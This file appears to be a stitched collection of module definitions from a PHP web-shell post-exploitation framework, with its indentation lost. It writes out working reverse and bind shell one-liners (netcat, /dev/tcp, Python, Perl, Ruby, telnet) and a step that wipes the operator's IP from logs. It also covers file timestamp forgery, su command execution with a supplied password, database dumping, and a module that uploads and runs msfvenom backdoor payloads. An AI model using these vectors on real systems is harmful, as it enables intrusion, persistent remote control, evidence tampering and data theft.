def init(self):
self.register_info({'author': ['Emilio Pinna'], 'license': 'GPLv3'})
self.register_vectors([
PhpCode(
"""@file_put_contents("${rpath}",file_get_contents("${url}"));""",
name="file_put_contents"),
ShellCmd("""wget ${url} -O ${rpath}""", name="wget"),
ShellCmd("""curl -o ${rpath} ${url}""", name="curl")
])
self.register_arguments([
{
'name': 'url',
'help': 'URL to download remotely'
},
{
'name': 'rpath',
'help': 'Remote file path'
},
{
'name': '-vector',
'choices': self.vectors.get_names(),
'default': "file_put_contents"
},
])
def init(self):
self.register_info({'author': ['appo'], 'license': 'GPLv3'})
self.register_vectors([
PhpCode("""$fc=file("${file}");
$f=fopen("${file}","w");
foreach($fc as $line)
{
if (!strstr($line,"${ip}"))
fputs($f,$line);
}
fclose($f);""",
name="php_clear"),
ShellCmd("""sed -i /${ip}/d ${file}""", name="clearlog"),
ShellCmd(
"""sed /${ip}/d ${file} > ${file}.$$ && /bin/mv ${file}.$$ ${file}""",
name="old_school")
])
self.register_arguments([
{
'name': 'ip',
'help': 'Your IP'
},
{
'name': 'file',
'help': 'File to Clear'
},
{
'name': '-vector',
'choices': self.vectors.get_names(),
'default': "clearlog"
},
])
def _get_ifconfig_result(self, ifconfig_path):
result = ShellCmd(ifconfig_path, target=Os.NIX).run()
if not result:
log.debug(
messages.module_net_ifconfig.error_no_s_execution_result %
ifconfig_path)
return {}
ifaces = re.findall('^(\S+).*?inet addr:(\S+).*?Mask:(\S+)', result,
re.S | re.M)
if not ifaces:
log.debug(
messages.module_net_ifconfig.error_parsing_s_execution_result %
ifconfig_path)
return {}
networks = {}
for iface in ifaces:
try:
networks[iface[0]] = IPNetwork('%s/%s' % (iface[1], iface[2]))
except Exception as e:
log.debug(messages.module_net_ifconfig.
error_interpeting_s_execution_result_s %
(ifconfig_path, str(e)))
pass
return networks
def init(self):
self.register_info(
{
'author': [
'Ganapati'
],
'license': 'GPLv3'
}
)
self.register_arguments([
{ 'name' : 'rpath', 'help' : 'Remote file path', 'default' : '/tmp/%s' % (random.randint(1,99999)), 'nargs' : '?' },
{ 'name' : 'rpython', 'help' : 'Remote python interpreter path', 'default' : 'python', 'nargs' : '?' },
])
self.register_vectors(
[
ModuleExec(
module = 'file_upload',
arguments = [os.path.join(self.folder, 'linuxprivchecker.py'), '${rpath}'],
name = 'upload_script'
),
ShellCmd(
payload = """${rpython} '${rpath}'""",
name = 'exec_script'
)
]
)
def init(self):
self.register_info(
{
'author': [
'Emilio Pinna'
],
'license': 'GPLv3'
}
)
self.register_vectors(
[
ShellCmd(
payload = "mysqldump -h ${host} -u${user} -p${passwd} ${db} ${table} --single-transaction",
name = 'mysqldump_sh'
),
PhpFile(
payload_path = os.path.join(self.folder, 'mysqldump.tpl'),
name = 'mysqldump_php',
)
]
)
self.register_arguments([
{ 'name' : 'db', 'help' : 'Db to dump' },
{ 'name' : 'user', 'help' : 'SQL username' },
# Using passwd instead of pass to avoid rendering the `pass` keyword
{ 'name' : 'passwd', 'help' : 'SQL password' },
{ 'name' : '-dbms', 'help' : 'Db type. Vector \'mysqldump_sh\' supports only \'mysql\'.', 'choices' : ('mysql', 'pgsql', 'sqlite', 'dblib'), 'default' : 'mysql' },
{ 'name' : '-host', 'help' : 'Db host or host:port', 'nargs' : '?', 'default' : '127.0.0.1' },
{ 'name' : '-lpath', 'help' : 'Dump to local path (default: temporary file)' },
{ 'name' : '-vector', 'choices' : self.vectors.get_names(), 'default' : 'mysqldump_php' }
])
def init(self):
self.register_info({'author': ['Emilio Pinna'], 'license': 'GPLv3'})
self.register_vectors([
PhpCode("print(@base64_encode(implode('',@file('${rpath}'))));",
name='file'),
PhpCode(
"$f='${rpath}';print(@base64_encode(fread(fopen($f,'rb'),filesize($f))));",
name='fread'),
PhpCode("print(@base64_encode(file_get_contents('${rpath}')));",
name='file_get_contents'),
ShellCmd("base64 -w 0 ${rpath} 2>/dev/null",
name='base64',
target=Os.NIX),
])
self.register_arguments([{
'name': 'rpath',
'help': 'Remote file path'
}, {
'name': 'lpath',
'help': 'Local file path'
}, {
'name': '-vector',
'choices': self.vectors.get_names(),
'default': 'file'
}])
def init(self):
self.register_info({'author': ['Emilio Pinna'], 'license': 'GPLv3'})
self.register_vectors([
PhpCode("(@copy('${srcpath}', '${dstpath}')&&print(1))||print(0);",
name='php_copy'),
PhpCode(
"(@file_put_contents('${dstpath}', file_get_contents('${srcpath}'))&&print(1))||print(0);",
name='php_file_contents'),
ShellCmd("cp '${srcpath}' '${dstpath}' && echo 1 || echo 0",
name='sh_cp',
target=Os.NIX),
])
self.register_arguments([{
'name': 'srcpath',
'help': 'Remote source file path'
}, {
'name': 'dstpath',
'help': 'Remote destination file path'
}, {
'name': '-vector',
'choices': self.vectors.get_names()
}])
def init(self):
self.register_info(
{
'author': [
'Emilio Pinna'
],
'license': 'GPLv3'
}
)
self.register_vectors(
[
PhpFile(
payload_path = os.path.join(self.folder, 'php_context.tpl'),
name = 'file_get_contents',
),
PhpFile(
payload_path = os.path.join(self.folder, 'php_context.tpl'),
name = 'fopen_stream_get_contents',
),
PhpFile(
payload_path = os.path.join(self.folder, 'php_context.tpl'),
name = 'fopen_fread',
),
PhpFile(
payload_path = os.path.join(self.folder, 'php_curl.tpl'),
name = 'php_curl',
),
PhpFile(
payload_path = os.path.join(self.folder, 'php_httprequest1.tpl'),
name = 'php_httprequest1',
),
ShellCmd(
payload = """curl -s -i ${ "-A '%s'" % user_agent if user_agent else "" } ${ '--connect-timeout %i' % connect_timeout } ${ '-X %s' % request if (not data and request) else '' } ${ " ".join([ "-H '%s'" % h for h in header ]) } ${ "-b '%s'" % cookie if cookie else '' } ${ ' '.join([ "-d '%s'" % d for d in data ]) } '${ url }'""",
name = 'sh_curl'
)
]
)
self.register_arguments([
{ 'name' : 'url' },
{ 'name' : '--header', 'dest' : 'header', 'action' : 'append', 'default' : [] },
{ 'name' : '-H', 'dest' : 'header', 'action' : 'append', 'default' : [] },
{ 'name' : '--cookie', 'dest' : 'cookie' },
{ 'name' : '-b', 'dest' : 'cookie' },
{ 'name' : '--data', 'dest' : 'data', 'action' : 'append', 'default' : [] },
{ 'name' : '-d', 'dest' : 'data', 'action' : 'append', 'default' : [] },
{ 'name' : '--user-agent', 'dest' : 'user_agent' },
{ 'name' : '-A', 'dest' : 'user_agent' },
{ 'name' : '--connect-timeout', 'type' : int, 'default' : 5, 'help' : 'Default: 2' },
{ 'name' : '--request', 'dest' : 'request', 'choices' : ( 'GET', 'HEAD', 'POST', 'PUT' ), 'default' : 'GET' },
{ 'name' : '-X', 'dest' : 'request', 'choices' : ( 'GET', 'HEAD', 'POST', 'PUT' ), 'default' : 'GET' },
{ 'name' : '--output', 'dest' : 'output' },
{ 'name' : '-o', 'dest' : 'output' },
{ 'name' : '-i', 'dest' : 'include_headers', 'help' : 'Include response headers', 'action' : 'store_true', 'default' : False },
{ 'name' : '-local', 'action' : 'store_true', 'default' : False, 'help' : 'Save file locally with -o|--output' },
{ 'name' : '-vector', 'choices' : self.vectors.get_names(), 'default' : 'file' }
])
def init(self):
self.register_info(
{
'author': [
'Emilio Pinna'
],
'license': 'GPLv3'
}
)
self.register_vectors(
[
ShellCmd(
"nc -l -p ${port} -e ${shell}",
name = 'netcat',
target = Os.NIX,
background = True
),
ShellCmd(
"rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|${shell} -i 2>&1|nc -l ${port} >/tmp/f; rm -rf /tmp/f",
name = 'netcat_bsd',
target = Os.NIX,
background = True
),
ShellCmd(
"""python -c 'import pty,os,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("", ${port}));s.listen(1);(rem, addr) = s.accept();os.dup2(rem.fileno(),0);os.dup2(rem.fileno(),1);os.dup2(rem.fileno(),2);pty.spawn("${shell}");s.close()';""",
name = 'python_pty',
target = Os.NIX,
background = True
),
ShellCmd(
"""socat tcp-l:${port} exec:${shell}""",
name = 'socat',
target = Os.NIX,
background = True
)
]
)
self.register_arguments([
{ 'name' : 'port', 'help' : 'Port to spawn', 'type' : int },
{ 'name' : '-shell', 'help' : 'Specify shell', 'default' : '/bin/sh' },
{ 'name' : '-no-autonnect', 'help' : 'Skip autoconnect', 'action' : 'store_true', 'default' : False },
{ 'name' : '-vector', 'choices' : self.vectors.get_names() }
])
def init(self):
self.register_info({'author': ['Emilio Pinna'], 'license': 'GPLv3'})
# The grep action is done using multiple request.
# First search for writable file, and then execute the grep
# code for every found file. This allows to reuse code in
# find_perm module and reduce the chances of timeout.
self.register_vectors([
ShellCmd(
payload=
"grep ${ '' if case else '-i' } -e '${regex}' '${rfile}'",
name="grep_sh",
arguments=[
"-stderr_redirection",
" 2>/dev/null",
],
# Remove the trailing newline
postprocess=lambda r: r[:-1] if r and r.endswith('\n') else r),
PhpCode(
payload=
"""$m=Array();preg_match_all("/${'' if regex.startswith('^') else '.*' }${regex.replace('/','\/')}${'' if regex.endswith('$') else '.*' }/m${ '' if case else 'i'}",file_get_contents('${rfile}'),$m);if($m) print(implode(PHP_EOL,$m[0]));""",
name="grep_php")
])
self.register_arguments([
{
'name': 'rpath',
'help': 'Path. If is a folder grep all the contained files.'
},
{
'name': 'regex',
'help': 'Regular expression to match file name'
},
{
'name': '-case',
'help': 'Search case sensitive expression',
'action': 'store_true',
'default': False
},
{
'name': '-name-regex',
'help': 'Regular expression to match file name to grep'
},
{
'name': '-no-recursion',
'action': 'store_true',
'default': False
},
{
'name': '-vector',
'choices': self.vectors.get_names(),
'default': 'grep_php'
},
])
def run(self):
uname = ShellCmd("""uname -a""").run().strip()
_uname = ShellCmd("""uname -srv""").run().strip()
if not uname:
return
path = os.path.dirname(os.path.realpath(__file__))
output = subprocess.check_output([
'bash', '-c',
"%s/linux-exploit/linux-exploit.sh" % path, "-u", uname
])
lines = [bold(yellow(_uname))]
for line in output.split("\n"):
if line.startswith("[+]"):
line = line.replace("\n", "")
lines.append(line)
return "\n".join(lines)
def run(self, args):
result = ShellCmd(
payload=
"""find ${rpath} -type f ${ '-perm -04000' if not only_sgid else '' } ${ '-o' if not only_suid and not only_sgid else '' } ${ '-perm -02000' if not only_suid else '' }""",
arguments=[
"-stderr_redirection",
" 2>/dev/null",
]).run(args)
if result:
return result.split('\n')
def init(self):
self.register_info({'author': ['Emilio Pinna'], 'license': 'GPLv3'})
self.register_vectors([
ShellCmd(
"""expect -c 'spawn su -c "${command}" "${user}"; expect -re "assword"; send "${ passwd }\r\n"; expect eof;'""",
name="sh_expect",
postprocess=lambda x: re.findall(
'Password: (?:\r\n)?([\s\S]+)', x)[0]
if 'Password: '******''),
ShellCmd(
"""python -c 'import pexpect as p,sys;c=p.spawn("su ${user} -c ${command}");c.expect(".*assword:");c.sendline("${ passwd }");i=c.expect([p.EOF,p.TIMEOUT]);sys.stdout.write(c.before[3:] if i!=p.TIMEOUT else "")'""",
"pyexpect")
])
self.register_arguments([{
'name': 'passwd',
'help': 'User\'s password'
}, {
'name': 'command',
'help': 'Shell command',
'nargs': '+'
}, {
'name': '-user',
'help': 'User to run the command with',
'default': 'root'
}, {
'name': '-stderr_redirection',
'default': ' 2>&1'
}, {
'name':
'-vector-sh',
'choices': ('system', 'passthru', 'shell_exec', 'exec', 'popen',
'proc_open', 'perl_system', 'pcntl')
}, {
'name': '-vector',
'choices': self.vectors.get_names()
}])
def init(self):
self.register_info(
{
'author': [
'Emilio Pinna'
],
'license': 'GPLv3'
}
)
self.register_vectors(
[
PhpFile(
payload_path = os.path.join(self.folder, 'bfs_walker.tpl'),
name = 'php_find',
),
ShellCmd(
# -print -quit must be at the end of the command
payload = """find ${rpath} ${ '-maxdepth 1' if no_recursion else '' } ${ '-writable' if writable else '' } ${ '-readable' if readable else '' } ${ '-executable' if executable else '' } ${ '-type %s' % (ftype) if (ftype == 'd' or ftype == 'f') else '' } ${ "-%sregex '.*%s.*'" % ( '' if case else 'i', expression) if expression else '' } ${ '-print -quit' if quit else '' }""",
name = "sh_find",
arguments = [
"-stderr_redirection",
" 2>/dev/null",
]
)
]
)
self.register_arguments([
{ 'name' : 'rpath', 'help' : 'Starting path' },
{ 'name' : 'expression', 'help' : 'Regular expression to match file name', 'nargs' : '?' },
{ 'name' : '-quit', 'action' : 'store_true', 'default' : False, 'help' : 'Quit at first result' },
{ 'name' : '-writable', 'action' : 'store_true' },
{ 'name' : '-readable', 'action' : 'store_true' },
{ 'name' : '-executable', 'action' : 'store_true' },
{ 'name' : '-ftype', 'help' : 'File type', 'choices' : ( 'f', 'd' ) },
{ 'name' : '-no-recursion', 'action' : 'store_true', 'default' : False },
{ 'name' : '-vector', 'choices' : self.vectors.get_names(), 'default' : 'php_find' },
{ 'name' : '-case', 'help' : 'Case sensitive', 'action' : 'store_true', 'default' : False },
])
def init(self):
self.register_info(
{
'author': [
'Emilio Pinna'
],
'license': 'GPLv3'
}
)
self.register_vectors(
[
PhpCode(
"touch('${rpath}', ${epoch_ts});",
name = 'php_touch'
),
ShellCmd(
"touch -d @${epoch_ts} '${rpath}'",
name = 'sh_touch',
target = Os.NIX
),
]
)
self.register_arguments([
{ 'name' : 'rpath', 'help' : 'Remote file path' },
{ 'name' : '-epoch-ts', 'help' : 'Epoch timestamp', 'type' : int },
{ 'name' : '-human-ts',
'help' : 'Human readable timestamp e.g. \'2004-02-29 16:21:42\' or \'16:21\''
},
{ 'name' : '-file-ts', 'help' : 'Clone timestamp from another file' },
{ 'name' : '-oldest-file-ts',
'help' : 'Clone timestamp from the oldest file in the same folder',
'action' : 'store_true',
'default' : False
},
{ 'name' : '-vector', 'choices' : self.vectors.get_names(), 'default' : 'php_touch' }
])
def run(self):
# Check msfvenom existance
msvenom_path = spawn.find_executable(self.args['msfvenom_path'])
if not msvenom_path:
log.error(
messages.module_backdoor_metasploit.msfvenom_s_not_found %
self.args['msfvenom_path'])
return
# Set options according to the payload type
options = []
if 'reverse' in self.args['payload']:
lhost = self.args.get('lhost')
if not lhost:
log.error(messages.module_backdoor_metasploit.
error_payload_s_requires_lhost %
self.args['payload'])
return
else:
options += [('LHOST', lhost)]
else:
options += [('RHOST', host)]
options += [('PORT', self.args.get('port'))]
log.warn(messages.module_backdoor_metasploit.make_sure_run_msfconsole)
log.info(
'msfconsole -x "use exploit/multi/handler; set PAYLOAD %s; %s run"'
% (self.args['payload'], ' '.join(
["set %s %s;" % (f, v) for f, v in options])))
# Get temporary file name
local_file = tempfile.NamedTemporaryFile()
local_path = local_file.name
# Build argument list for msfvenom
arguments_list = [
msvenom_path, '-p', self.args['payload'], '-o', local_path
] + ['%s=%s' % (v, f) for v, f in options]
# Add executable format to the argument list
if self.args['payload'].startswith('linux/'):
arguments_list += ['-f', 'elf']
elif self.args['payload'].startswith('windows/'):
arguments_list += ['-f', 'exe']
log.debug(' '.join(arguments_list))
# Generate meterpreter PHP code
agent = ''
status = 0
try:
subprocess.check_call(arguments_list,
stderr=open('/dev/null', 'w'))
agent = open(local_path, 'r').read()
except subprocess.CalledProcessError as e:
status = e.returncode
except Exception as e:
log.debug(str(e))
status = -1
if status or not agent:
log.error(
messages.module_backdoor_metasploit.error_generating_payload)
return
if self.args['payload'].startswith('php/'):
# If PHP payload, just run it
PhpCode(agent, background=True).run()
else:
if self.session['shell_sh']['status'] != Status.RUN:
log.error(messages.module_backdoor_metasploit.
error_payload_s_requires_shell_use_php %
self.args['payload'])
return
# Else: upload, execute, remove
folders = ModuleExec(
"file_find",
['-writable', '-quit', '-ftype', 'd', self.args['rpath']
]).run()
if not folders or not folders[0]:
log.error(messages.module_backdoor_metasploit.
error_searching_writable_folder_under_s %
(self.args['rpath']))
return
local_filename = os.path.basename(local_path)
remote_path = os.path.join(folders[0], local_filename)
ModuleExec("file_upload", [local_path, remote_path]).run()
# Let the uploaded file executable
ShellCmd("chmod +x %s" % (remote_path)).run()
# Execute the payload in background
ShellCmd(remote_path, background=True).run()
ModuleExec("file_rm", [self.args['rpath']]).run()
def init(self):
self.register_info({'author': ['Emilio Pinna'], 'license': 'GPLv3'})
# The grep action is done using multiple request.
# First search for writable file, and then execute the grep
# code for every found file. This allows to reuse code in
# find_perm module and reduce the chances of timeout.
self.register_vectors([
ShellCmd(
payload=
"grep ${ '' if case else '-i' } ${ '-v' if invert else '' } -e '${regex}' '${rfile}'",
name="grep_sh",
arguments=[
"-stderr_redirection",
" 2>/dev/null",
]),
PhpCode(payload="""% if invert:
$m=file_get_contents("${rfile}");$a=preg_replace("/${'' if regex.startswith('^') else '.*' }${regex.replace('/','\/')}${'' if regex.endswith('$') else '.*' }".PHP_EOL."?/m${ '' if case else 'i'}","",$m);if($a)print($a);
% else:
$m=Array();preg_match_all("/${'' if regex.startswith('^') else '.*' }${regex.replace('/','\/')}${'' if regex.endswith('$') else '.*' }/m${ '' if case else 'i'}",file_get_contents('${rfile}'),$m);if($m) print(implode(PHP_EOL,$m[0]));
% endif""",
name="grep_php")
])
self.register_arguments([
{
'name': 'rpath',
'help': 'Path. If is a folder grep all the contained files.'
},
{
'name': 'regex',
'help': 'Regular expression to match file name'
},
{
'name': '-case',
'help': 'Search case sensitive expression',
'action': 'store_true',
'default': False
},
{
'name': '-name-regex',
'help': 'Regular expression to match file name to grep'
},
{
'name': '-no-recursion',
'action': 'store_true',
'default': False
},
{
'name': '-output',
'help': 'Redirect output to remote file'
},
{
'name': '-v',
'dest': 'invert',
'action': 'store_true',
'default': False,
'help': 'Invert matching to select non-matching lines'
},
{
'name': '-local',
'action': 'store_true',
'default': False,
'help': 'Save redirected output locally'
},
{
'name': '-vector',
'choices': self.vectors.get_names(),
'default': 'grep_php'
},
])
def init(self):
self.register_info({'author': ['Emilio Pinna'], 'license': 'GPLv3'})
self.register_vectors([
ShellCmd(
"""sleep 1; rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|${shell} -i 2>&1|nc ${lhost} ${port} >/tmp/f""",
name='netcat_bsd',
target=Os.NIX,
background=True),
ShellCmd("sleep 1; nc -e ${shell} ${lhost} ${port}",
name='netcat',
target=Os.NIX,
background=True),
ShellCmd(
"""sleep 1; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${lhost}",${port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["${shell}","-i"]);'""",
name='python',
target=Os.NIX,
background=True),
ShellCmd(
"sleep 1; /bin/bash -c \'${shell} 0</dev/tcp/${lhost}/${port} 1>&0 2>&0\'",
name='devtcp',
target=Os.NIX,
background=True),
ShellCmd(
"""perl -e 'use Socket;$i="${lhost}";$p=${port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("${shell} -i");};'""",
name='perl',
target=Os.NIX,
background=True),
ShellCmd(
"""ruby -rsocket -e'f=TCPSocket.open("${lhost}",${port}).to_i;exec sprintf("${shell} -i <&%d >&%d 2>&%d",f,f,f)'""",
name='ruby',
target=Os.NIX,
background=True),
ShellCmd(
"""sleep 1;rm -rf /tmp/backpipe;mknod /tmp/backpipe p;telnet ${lhost} ${port} 0</tmp/backpipe | ${shell} 1>/tmp/backpipe""",
name='telnet',
target=Os.NIX,
background=True),
ShellCmd(
"""sleep 1; python -c 'import socket,pty,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${lhost}",${port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);pty.spawn("${shell}");'""",
name='python_pty',
target=Os.NIX,
background=True)
])
self.register_arguments([{
'name': 'lhost',
'help': 'Local host'
}, {
'name': 'port',
'help': 'Port to spawn',
'type': int
}, {
'name': '-shell',
'help': 'Specify shell',
'default': '/bin/sh'
}, {
'name': '-no-autonnect',
'help': 'Skip autoconnect',
'action': 'store_true',
'default': False
}, {
'name': '-vector',
'choices': self.vectors.get_names()
}])